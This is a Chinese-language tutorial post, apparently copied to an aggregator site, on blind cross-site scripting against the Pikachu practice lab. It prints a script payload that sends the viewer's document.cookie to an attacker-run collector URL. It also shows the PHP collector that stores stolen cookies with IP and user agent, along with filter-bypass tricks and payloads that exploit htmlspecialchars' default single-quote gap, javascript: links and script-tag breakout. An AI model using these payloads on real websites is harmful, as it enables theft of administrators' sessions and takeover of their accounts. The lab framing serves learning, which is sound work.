XSS盲打

Posted liqik

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS盲打相关的知识,希望对你有一定的参考价值。

0x00:XSS盲打

简介

技术图片

 

 

 尽可能地于一切可能的地方提交XSS语句,只要后台管理员看到某一条语句,此语句就能被执行。
可以再留言板上留下获取cookie的代码,只要管理员在后台看到,就能获取管理员的cookie。

原理就是你给前台插payload,只要后台管理员浏览过,js代码已经被管理员触发,你Xss平台就会反馈给你信息。

联系平台 pikachu

技术图片

 

 

 此站点是 自己接收cookie的站点

payloads

简单测试一下<script>alert(123)</script>

登陆后台测试,产生弹窗

技术图片

 

 

 技术图片

 

 

 获取cookies payloads

<script>document.location=‘http://192.168.2.211/pikachu-master/pkxss/xcookie/cookie.php?cookie=‘ + document.cookie;</script>

payload的意思就是,获取当前用户cookie,并以参数的方式发送到http://192.168.2.211/pikachu-master/pkxss/xcookie/cookie.php

查看后台获取的结果,获取admin用户的cookie

技术图片

 

 

 cookie.php代码:

<?php
include_once ‘../inc/config.inc.php‘;
include_once ‘../inc/mysql.inc.php‘;
$link=connect();

//这个是获取cookie的api页面

if(isset($_GET[‘cookie‘])){
    $time=date(‘Y-m-d g:i:s‘);
    $ipaddress=getenv (‘REMOTE_ADDR‘);
    $cookie=$_GET[‘cookie‘];
    $referer=$_SERVER[‘HTTP_REFERER‘];
    $useragent=$_SERVER[‘HTTP_USER_AGENT‘];
    $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
    values(‘$time‘,‘$ipaddress‘,‘$cookie‘,‘$referer‘,‘$useragent‘)";
    $result=mysqli_query($link, $query);
}
header("Location:http://127.0.0.1/pikachu-master/index.php");//重定向到一个可信的网站,例如www.baidu.com

?>

 

学习链接:

https://zhuanlan.zhihu.com/p/25697201

0x01:XSS绕过

0.前端限制——抓包重放/直接F12修改前端代码
1.大小写——<SCriPt>AleRt(test)</ScRipt>
2.拼凑法——<scri<script>pt>alert(test)</scr<srcript>ipt>
3.注释干扰法——<scri<!--test-->pt>alert(test)</scr<!--test-->ipt>
4.编码法——对Payload进行html编码


0x02:htmlspecialchars()

参考:https://www.w3school.com.cn/php/func_string_htmlspecialchars.asp

https://blog.csdn.net/weixin_43716322/article/details/89480895

技术图片

 

 技术图片

 

技术图片

 htmlspecialchars()函数默认只编码双引号,当开发者未对单引号过滤时,就会可能导致XSS的发生(不久之前还跟别人说这个函数很厉害,能当住xss)

payload:

1‘ onclick=‘alert(1)‘

技术图片

 

 

href输出

payloads:  javascript:alert(1)

 

js输出

技术图片

 

 payload:

</script><script>alert(1)</script>

Done!

以上是关于XSS盲打的主要内容,如果未能解决你的问题,请参考以下文章

XSS盲打测试(pikachu)

web安全XSS红队盲打&蓝队钓鱼反击&权限维持

不用cookie 一个盲打储存XSS对“某btc平台”攻城略地

网络安全实操XSS订单系统漏洞(利用盲打)

XSS漏洞攻防

Pikachu之XSS